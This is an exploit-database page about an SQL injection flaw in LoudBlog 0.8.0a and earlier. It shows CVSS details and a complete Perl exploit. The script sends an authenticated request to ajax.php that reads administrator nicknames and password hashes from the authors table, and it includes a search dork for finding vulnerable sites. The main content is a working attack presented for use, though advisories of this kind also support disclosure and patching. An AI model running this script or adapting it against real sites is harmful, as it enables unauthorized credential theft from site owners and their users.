LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)

2009.02.07
Credit: Xianur0
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # This Exploit requires a valid user name and password of an account regardless of the permissions # # Author: Xianur0 # Affected: All Versions # Bug: SQL Injection # # Doorks: # allintext: "powered by LoudBlog" use HTTP::Request::Common qw(POST); use LWP::UserAgent; use Digest::MD5 qw(md5_hex); $ua = LWP::UserAgent->new; print "\n LoudBlog Exploit All Version By Xianur0\n\n"; $uri = $ARGV[0]; $id = $ARGV[1]; $password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n"); $md5 = md5_hex($ARGV[2]).":".md5_hex($password); my $req = POST $uri.'/loudblog/ajax.php', [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread']; $req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17'); $req->header('Cookie' => 'lbauth='.$md5); $res = $ua->request($req); print $res->content."\n";

References:

http://www.securityfocus.com/bid/31878
http://www.milw0rm.com/exploits/6808


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top